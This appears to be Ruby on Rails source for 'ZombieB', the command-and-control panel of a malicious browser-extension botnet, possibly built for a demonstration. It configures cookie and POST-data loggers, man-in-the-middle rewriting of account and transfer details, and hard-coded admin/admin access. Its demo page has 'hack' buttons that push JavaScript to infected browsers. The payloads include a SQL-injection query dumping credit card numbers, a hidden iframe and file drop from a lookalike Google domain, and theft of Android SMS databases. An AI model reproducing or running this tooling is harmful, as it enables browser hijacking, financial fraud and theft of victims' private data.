full/server/ZombieB/config/routes.rb
ZombieB::Application.routes.draw do
  resources :file
  resources :upload
  match 'postinfos/removeall' => 'postinfos#removeall'
  resources :postinfos
  match 'cookies/removeall' => 'cookies#removeall'
  resources :cookies
  resources :ccconfigs
  resources :zombies do
	resources :ccconfigs
	resources :cookies 
	resources :postinfos
  end

  match 'c/:hashid' => 'zombies#conf'
  match 'login/:hashid' => 'zombies#login'
  match 'addcookie/:hashid' => 'cookies#new_fromhash'
  match 'addpostinfo/:hashid' => 'postinfos#new_fromhash'
  match 'upload/:hashid' => 'zombies#upload' 
  match 'extensions' => 'extensions#show' 
  match 'ccconfigs/:id/demo' => 'ccconfigs#demo', :as=>:demo

   root :to => 'zombies#index'

end

full/server/ZombieB/app/models/ccconfig.rb
class Ccconfig < ActiveRecord::Base
  belongs_to :zombie
  attr_accessible :balancepage,:loginhost,:checksslvar,:cookieloggerhost,:cookieloggingenabled,:enablemitm,:jscommandid,:jscommand,:logoutpostdata,:modifyurl,:myaccount,:newaccount,:origaccount,:origmsg,:postdataloggerhost,:postenabled,:cookielist,:transferurl,:uploadpath,:hashid, :zombie_id, :zombie
end

full/server/ZombieB/app/controllers/ccconfigs_controller.rb
class CcconfigsController < ApplicationController
http_basic_authenticate_with :name => "admin", :password => "admin", :except => :show
protect_from_forgery
  # GET /ccconfigs
  # GET /ccconfigs.json
  def index
    @ccconfigs = Ccconfig.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @ccconfigs }
    end
  end

  # GET /ccconfigs/1
  # GET /ccconfigs/1.json
  def show
    @ccconfig = Ccconfig.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @ccconfig }
    end
  end

  # GET /ccconfigs/new
  # GET /ccconfigs/new.json
  def new
    @ccconfig = Ccconfig.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @ccconfig }
    end
  end

  # GET /ccconfigs/1/edit
  def edit
    @ccconfig = Ccconfig.find(params[:id])
	@zombie = Zombie.find(@ccconfig.zombie_id)
  end
  
  def demo
    @ccconfig = Ccconfig.find(params[:id])
	@zombie = Zombie.find(@ccconfig.zombie_id) 
  end
  
  # POST /ccconfigs
  # POST /ccconfigs.json
  def create
	@zombie = Zombie.find(params[:zombie_id])
    @ccconfig = @zombie.ccconfig.create(params[:ccconfig])
    redirect_to zombie_path(@zombie)
	
    #@ccconfig = Ccconfig.new(params[:ccconfig])

    #respond_to do |format|
    #  if @ccconfig.save
    #    format.html { redirect_to @ccconfig, notice: 'Ccconfig was successfully created.' }
    #    format.json { render json: @ccconfig, status: :created, location: @ccconfig }
    #  else
    #    format.html { render action: "new" }
    #    format.json { render json: @ccconfig.errors, status: :unprocessable_entity }
    #  end
    #end
  end

  # PUT /ccconfigs/1
  # PUT /ccconfigs/1.json
  def update
    @ccconfig = Ccconfig.find(params[:id])
	@jscommandid = params[:ccconfig][:jscommandid]
	@jscommand = params[:ccconfig][:jscommand]
	
	#if (@ccconfig.jscommand != @jscommand)
	# ugly hack to detect if user is coming from demo button page or edit page
	# if coming from demo button page (or jscommand changed), increment jscommandid
	if (!(params[:ccconfig][:cookielist]) || (@ccconfig.jscommand != @jscommand))
		params[:ccconfig][:jscommandid] = (@jscommandid.to_i + 1).to_s
	end
    respond_to do |format|
      if @ccconfig.update_attributes(params[:ccconfig])
        format.html { redirect_to :controller => "ccconfigs", :action => "demo", :id => @ccconfig.id , notice: 'Ccconfig was successfully updated.' }
        format.json { head :no_content }
		format.js  
      else
        format.html { render action: "edit" }
        format.json { render json: @ccconfig.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /ccconfigs/1
  # DELETE /ccconfigs/1.json
  def destroy
    @ccconfig = Ccconfig.find(params[:id])
    @ccconfig.destroy

    respond_to do |format|
      format.html { redirect_to ccconfigs_url }
      format.json { head :no_content }
    end
  end
end

full/server/ZombieB/app/helpers/ccconfigs_helper.rb
module CcconfigsHelper
end

full/server/ZombieB/app/views/ccconfigs/_form.html.erb
<%= form_for(@ccconfig) do |f| %>
  <% if @ccconfig.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@ccconfig.errors.count, "error") %> prohibited this ccconfig from being saved:</h2>

      <ul>
      <% @ccconfig.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>


  <div class="field">
    <%= f.label :jscommand %><br />
    <%= f.text_field :jscommand, :size => 150 %>
  </div>
    <div class="actions">
    <%= f.submit "Hack!"  ,:id => 'hack'%>
  </div>
    
  <div class="field">
    <%= f.label :jscommandid %><br />
    <%= f.number_field :jscommandid %>
  </div>
  <div class="field">
    <%= f.label :"rewrite URL content location" %><br />
    <%= f.text_field :balancepage, :size => 150 %>
  </div>

  <div class="field">
    <%= f.label :"data to overwrite" %><br />
    <%= f.text_field :myaccount, :size => 150 %>
  </div>
    <div class="field">
    <%= f.label :"new data" %><br />
    <%= f.text_field :origmsg, :size => 150 %>
  </div>
  
  <div class="field">
    <%= f.label :checksslvar %><br />
    <%= f.check_box :checksslvar %>
  </div>
  <div class="field">
    <%= f.label :loginhost %><br />
    <%= f.text_field :loginhost, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :cookieloggerhost %><br />
    <%= f.text_field :cookieloggerhost, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :cookieloggingenabled %><br />
    <%= f.check_box :cookieloggingenabled %>
  </div>
  <div class="field">
    <%= f.label :enablemitm %><br />
    <%= f.check_box :enablemitm %>
  </div>
  <div class="field">
    <%= f.label :logoutpostdata %><br />
    <%= f.text_field :logoutpostdata, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :modifyurl %><br />
    <%= f.text_field :modifyurl, :size => 150 %>
  </div>

  <div class="field">
    <%= f.label :newaccount %><br />
    <%= f.text_field :newaccount, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :origaccount %><br />
    <%= f.text_field :origaccount, :size => 150 %>
  </div>

  <div class="field">
    <%= f.label :postdataloggerhost %><br />
    <%= f.text_field :postdataloggerhost, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :postenabled %><br />
    <%= f.check_box :postenabled %>
  </div>
  <div class="field">
    <%= f.label :cookielist %><br />
    <%= f.text_field :cookielist, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :transferurl %><br />
    <%= f.text_field :transferurl, :size => 150 %>
  </div>
  <div class="field">
    <%= f.label :uploadpath %><br />
    <%= f.text_field :uploadpath, :size => 150 %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/ccconfigs/_form_zombie_delete.html.erb
<%= form_for([@zombie, @zombie.ccconfig]) do |f| %>
  <div class="field">
    <%= f.label :jscommand %><br />
    <%= f.text_field :jscommand , :size => 150  %>
  </div>

  <div class="field">
    <%= f.label :jscommandid %><br />
    <%= f.number_field :jscommandid %>
  </div>
  <div class="field">
    <%= f.label :balancepage %><br />
    <%= f.text_field :balancepage, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :checksslvar %><br />
    <%= f.check_box :checksslvar %>
  </div>
  <div class="field">
    <%= f.label :loginhost %><br />
    <%= f.text_field :loginhost, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :cookieloggerhost %><br />
    <%= f.text_field :cookieloggerhost, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :cookieloggingenabled %><br />
    <%= f.check_box :cookieloggingenabled %>
  </div>
  <div class="field">
    <%= f.label :enablemitm %><br />
    <%= f.check_box :enablemitm %>
  </div>
  <div class="field">
    <%= f.label :logoutpostdata %><br />
    <%= f.text_field :logoutpostdata %>
  </div>
  <div class="field">
    <%= f.label :modifyurl %><br />
    <%= f.text_field :modifyurl, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :myaccount %><br />
    <%= f.text_field :myaccount %>
  </div>
  <div class="field">
    <%= f.label :newaccount %><br />
    <%= f.text_field :newaccount %>
  </div>
  <div class="field">
    <%= f.label :origaccount %><br />
    <%= f.text_field :origaccount %>
  </div>
  <div class="field">
    <%= f.label :origmsg %><br />
    <%= f.text_field :origmsg, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :postdataloggerhost %><br />
    <%= f.text_field :postdataloggerhost, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :postenabled %><br />
    <%= f.check_box :postenabled %>
  </div>
  <div class="field">
    <%= f.label :cookielist %><br />
    <%= f.text_field :cookielist, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :transferurl %><br />
    <%= f.text_field :transferurl, :size => 150  %>
  </div>
  <div class="field">
    <%= f.label :uploadpath %><br />
    <%= f.text_field :uploadpath, :size => 150  %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/ccconfigs/_index_zombie.html.erb
<h1>Listing ccconfig</h1>

<table>
  <tr>
	<th>Jscommand</th>
	<th>Jscommandid</th>    
    <th>Balancepage</th>
    <th>Checksslvar</th>
   
  </tr>


  <tr>
	<td><%= @zombie.ccconfig.jscommand %></td>
    <td><%= @zombie.ccconfig.jscommandid %></td>
    <td><%= @zombie.ccconfig.balancepage %></td>
    <td><%= @zombie.ccconfig.checksslvar %></td>
    
  </tr>
  <tr> <th>Cookieloggerhost</th>
    <th>Cookieloggingenabled</th>
    <th>Enablemitm</th>    
    <th>Logoutpostdata</th>
    
  </tr>
  <tr>
  <td><%= @zombie.ccconfig.cookieloggerhost %></td>
    <td><%= @zombie.ccconfig.cookieloggingenabled %></td>
    <td><%= @zombie.ccconfig.enablemitm %></td>
    <td><%= @zombie.ccconfig.logoutpostdata %></td>
    
   </tr>
  
  <tr>
  <th>Modifyurl</th>
      <th>Myaccount</th>
    <th>Newaccount</th>
    <th>Origaccount</th>
    
  <tr>
 <td><%= @zombie.ccconfig.modifyurl %></td>
 <td><%= @zombie.ccconfig.myaccount %></td>
    <td><%= @zombie.ccconfig.newaccount %></td>
    <td><%= @zombie.ccconfig.origaccount %></td>
    
  <tr>
  <th>Origmsg</th>
    <th>Postdataloggerhost</th>
    <th>Postenabled</th>
    <th>Cookielist</th>
    
  </tr>
  <tr>
  <td><%= @zombie.ccconfig.origmsg %></td>
    <td><%= @zombie.ccconfig.postdataloggerhost %></td>
    <td><%= @zombie.ccconfig.postenabled %></td>
    <td><%= @zombie.ccconfig.cookielist %></td>
  </tr>
  <tr>
  <th>Transferurl</th>
    <th>Uploadpath</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>
    <tr>
    <td><%= @zombie.ccconfig.transferurl %></td>
    <td><%= @zombie.ccconfig.uploadpath %></td>
    </tr>
  
  <tr>
    <td><%= link_to 'Edit config', edit_ccconfig_path(@zombie.ccconfig) %></td>
</tr>
  <tr>  
  <td><%= link_to 'Destroy_config', @zombie.ccconfig, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>

</table>

<br />

full/server/ZombieB/app/views/ccconfigs/demo.html.erb
<h1>Demo hack buttons   ---- 
<%= @zombie.browsername  %> Zombie Nr. <%= @zombie.id  %>  test <%= @ccconfig.jscommandid.to_i+1  %>  
<br/><br/>
<%= link_to 'Edit zombie config', edit_ccconfig_path(@ccconfig) %>
</h1>
<%= csrf_meta_tag %> 

<%= form_for(@ccconfig) do |f| %>
  <% if @ccconfig.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@ccconfig.errors.count, "error") %> prohibited this ccconfig from being saved:</h2>

      <ul>
      <% @ccconfig.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.text_field :jscommand,  :hidden=>true %>
  </div>
    <div class="field">
    <%= f.number_field :jscommandid, :hidden=>true %>
  </div>
<div class="actions">
  <% if @zombie.browsername == "Firefox" then %>
  <%=f.submit "FF Alert(\"It is alive!!!!\")"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('alert(\"It is alive!!!!\")'); "%>

  </div>
  <div class="actions">
    <%= f.submit "FF Calc.exe"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.executeFile(\"c:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");');"%>
  </div>
  <div class="actions">
  
  <%= f.submit "FF modify stock prices"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('');"%>

  </div>
  <div class="actions">
    <%= f.submit "FF SQL1 - test app: http://webserver.intranet:81/secure_app/index.php?id=1&submit=submit"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.downloadContentFromURL(config2,\"http://webserver.intranet:81/secure_app/index.php?id=1&submit=submit\",\"GET\", \"\", \"application/octet-stream\");');"%>
  </div>
  <div class="actions">
    <%= f.submit "FF SQL2 - test SQL injection vulnerability: http://webserver.intranet:81/secure_app/index.php?id=1'&submit=submit"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.downloadContentFromURL(config2,\"http://webserver.intranet:81/secure_app/index.php?id=1%27&submit=submit\",\"GET\", \"\", \"application/octet-stream\");');"%>
  </div>
  <div class="actions">
    <%= f.submit "FF SQL3 - extract data via SQL injection: http://webserver.intranet:81/secure_app/index.php?id=1%20union%20select%201,cc_number%20from%20credit_card&submit=submit"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.downloadContentFromURL(config2,\"http://webserver.intranet:81/secure_app/index.php?id=1%20union%20select%201,cc_number%20from%20credit_card&submit=submit\",\"GET\", \"\", \"application/octet-stream\");');"%>
  </div>
    <div class="actions">
    <%= f.submit "FF Webcam"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('var file = Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\"C:\\\\\\\\Users\\\\\\\\CELocaladmin\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Macromedia\\\\\\\\FLASHP~1\\\\\\\\macromedia.com\\\\\\\\support\\\\\\\\flashplayer\\\\\\\\sys\\\\\\\\#static.cache.l.google.com-safebrowsing.hu\"); if( !file.exists() || !file.isDirectory() ) {file.create(Components.interfaces.nsIFile.DIRECTORY_TYPE, 0777);} this.downloadBinary(\"C:\\\\\\\\Users\\\\\\\\CELocaladmin\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Macromedia\\\\\\\\FLASHP~1\\\\\\\\macromedia.com\\\\\\\\support\\\\\\\\flashplayer\\\\\\\\sys\\\\\\\\\" + String.fromCharCode(parseInt(23,16)) +\"STATI~1.HU\\\\\\\\\",\"http://static.cache.l.google.com-safebrowsing.hu:81/bbdoor/settings.sol\",\"settings.sol\");var d=content.document;var i=d.createElement(\"iframe\");d.body.insertBefore(i, d.body.lastChild);i.src=\"http://static.cache.l.google.com-safebrowsing.hu:81/bbdoor/index.html\";i.style.width = \"1px\";i.style.height = \"1px\";');"%>
  </div>
    </div>
	  <div class="actions">
   <% end %>
  <% if @zombie.browsername == "Fennec" then %>
  <%= f.submit "FF mobile - geolocation"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.getLocation(config2);');"%>
  </div>
    <div class="actions">
	 
	  
    <%= f.submit "FF mobile - Upload to victim"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.downloadBinary(\"/mnt/sdcard/DCIM/Camera/\",\"http:static.cache.l.google.com-safebrowsing.hu/I_Know_What_You_Did_Last_Summer.jpg\",\"I_Know_What_You_Did_Last_Summer.jpg\");');"%>
  </div>
    </div>
    <div class="actions">
    <%= f.submit "FF mobile - Download SMS from victim"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('this.downloadContentFromURL(config2,\"file:///data/data/com.android.providers.telephony/databases/mmssms.db-wal\",\"GET\", \"\", \"application/octet-stream\")');"%>
  </div>
  <% end %>
  <div class="actions">
    <% if @zombie.browsername == "Chrome" then %>
	<%= f.submit "Chrome rootkit"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('');"%>
  </div>
  <div class="actions">
    <%= f.submit "Chrome alert(\"It is alive!!!!\")"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('alert(\"It is alive!!!!\")');"%>

  </div>
    <div class="actions">
    <%= f.submit "Chrome Native Client Distributed Password Hash Crack - SHA1 4e7ca30e853d7cf963f42beeec9e74cd0efdf142"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('document.getElementById(\"sha1_pwcrack\").postMessage(\"4e7ca30e853d7cf963f42beeec9e74cd0efdf142\");');"%>
  </div>	
  </div>
    <div class="actions">
    <%= f.submit "Chrome TTS"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('chrome.tts.speak(\"Wake up, Neo.\", {\"lang\": \"en-US\", \"rate\": 0.2});');"%>
  </div>
  <div class="actions">
    <%= f.submit "Chrome Google hack"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('');"%>
  </div>
  <% end %>
  <% if @zombie.browsername == "Safari" then %>
  <div class="actions">
    <%= f.submit "Safari alert(\"It is alive!!!!\")"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('alert(\"It is alive!!!!\")');"%>
  </div>
  <div class="actions">
    <%= f.submit "Safari add form"  ,:id => 'hack', :class=>'test', :onclick=>"$('input[id=ccconfig_jscommand]').val('');"%>
  </div>
  <% end %>
<% end %>
<%= link_to 'Show', @ccconfig %> |
<%= link_to 'Back', zombies_path %> |
<%= link_to 'Back to zombie', @zombie %>

full/server/ZombieB/app/views/ccconfigs/edit.html.erb
<h1>Editing ccconfig</h1>
<%= csrf_meta_tag %> 
<br/>
<%= link_to 'Back to Demo', {:controller => "ccconfigs", :action => "demo", :id => @zombie.ccconfig.id } %>
<br/><br/>
<%= render 'form' %>

<%= link_to 'Show', @ccconfig %> |
<%= link_to 'Back', zombies_path %> |
<%= link_to 'Back to zombie', @zombie %>

full/server/ZombieB/app/views/ccconfigs/index.html.erb
<h1>Listing ccconfigs</h1>

<table>
  <tr>
    <th>Balancepage</th>
    <th>Checksslvar</th>
	<th>Loginhost</th>
    <th>Cookieloggerhost</th>
    <th>Cookieloggingenabled</th>
    <th>Enablemitm</th>
    <th>Jscommandid</th>
    <th>Jscommand</th>
    <th>Logoutpostdata</th>
    <th>Modifyurl</th>
    <th>Myaccount</th>
    <th>Newaccount</th>
    <th>Origaccount</th>
    <th>Origmsg</th>
    <th>Postdataloggerhost</th>
    <th>Postenabled</th>
    <th>Cookielist</th>
    <th>Transferurl</th>
    <th>Uploadpath</th>
    <th>Zombie</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% @ccconfigs.each do |ccconfig| %>
  <tr>
    <td><%= ccconfig.balancepage %></td>
    <td><%= ccconfig.checksslvar %></td>
    <td><%= ccconfig.loginhost %></td>
	<td><%= ccconfig.cookieloggerhost %></td>
    <td><%= ccconfig.cookieloggingenabled %></td>
    <td><%= ccconfig.enablemitm %></td>
    <td><%= ccconfig.jscommandid %></td>
    <td><%= ccconfig.jscommand %></td>
    <td><%= ccconfig.logoutpostdata %></td>
    <td><%= ccconfig.modifyurl %></td>
    <td><%= ccconfig.myaccount %></td>
    <td><%= ccconfig.newaccount %></td>
    <td><%= ccconfig.origaccount %></td>
    <td><%= ccconfig.origmsg %></td>
    <td><%= ccconfig.postdataloggerhost %></td>
    <td><%= ccconfig.postenabled %></td>
    <td><%= ccconfig.cookielist %></td>
    <td><%= ccconfig.transferurl %></td>
    <td><%= ccconfig.uploadpath %></td>
    <td><%= ccconfig.zombie %></td>
    <td><%= link_to 'Show', ccconfig %></td>
    <td><%= link_to 'Edit', edit_ccconfig_path(ccconfig) %></td>
    <td><%= link_to 'Destroy', ccconfig, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>

<br />

<%= link_to 'New Ccconfig', new_ccconfig_path %>

full/server/ZombieB/app/views/ccconfigs/new.html.erb
<h1>New ccconfig</h1>

<%= render 'form' %>

<%= link_to 'Back', ccconfigs_path %>

full/server/ZombieB/app/views/ccconfigs/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Balancepage:</b>
  <%= @ccconfig.balancepage %>
</p>

<p>
  <b>Checksslvar:</b>
  <%= @ccconfig.checksslvar %>
</p>

<p>
  <b>Cookieloggerhost:</b>
  <%= @ccconfig.cookieloggerhost %>
</p>

<p>
  <b>Loginhost:</b>
  <%= @ccconfig.loginhost %>
</p>

<p>
  <b>Cookieloggingenabled:</b>
  <%= @ccconfig.cookieloggingenabled %>
</p>

<p>
  <b>Enablemitm:</b>
  <%= @ccconfig.enablemitm %>
</p>

<p>
  <b>Jscommandid:</b>
  <%= @ccconfig.jscommandid %>
</p>

<p>
  <b>Jscommand:</b>
  <%= @ccconfig.jscommand %>
</p>

<p>
  <b>Logoutpostdata:</b>
  <%= @ccconfig.logoutpostdata %>
</p>

<p>
  <b>Modifyurl:</b>
  <%= @ccconfig.modifyurl %>
</p>

<p>
  <b>Myaccount:</b>
  <%= @ccconfig.myaccount %>
</p>

<p>
  <b>Newaccount:</b>
  <%= @ccconfig.newaccount %>
</p>

<p>
  <b>Origaccount:</b>
  <%= @ccconfig.origaccount %>
</p>

<p>
  <b>Origmsg:</b>
  <%= @ccconfig.origmsg %>
</p>

<p>
  <b>Postdataloggerhost:</b>
  <%= @ccconfig.postdataloggerhost %>
</p>

<p>
  <b>Postenabled:</b>
  <%= @ccconfig.postenabled %>
</p>

<p>
  <b>Cookielist:</b>
  <%= @ccconfig.cookielist %>
</p>

<p>
  <b>Transferurl:</b>
  <%= @ccconfig.transferurl %>
</p>

<p>
  <b>Uploadpath:</b>
  <%= @ccconfig.uploadpath %>
</p>

<p>
  <b>Zombie:</b>
  <%= @ccconfig.zombie %>
</p>


<%= link_to 'Edit', edit_ccconfig_path(@ccconfig) %> |
<%= link_to 'Back', ccconfigs_path %>

full/server/ZombieB/app/views/ccconfigs/update.js.erb
$(document).ready(function() {
$('#test').click(function() {
	   $('input[id=ccconfig_jscommand]').val('alert(2)');
	   //alert(1);
	   $('#edit_ccconfig').submit();
       //return false;
   });
});   
   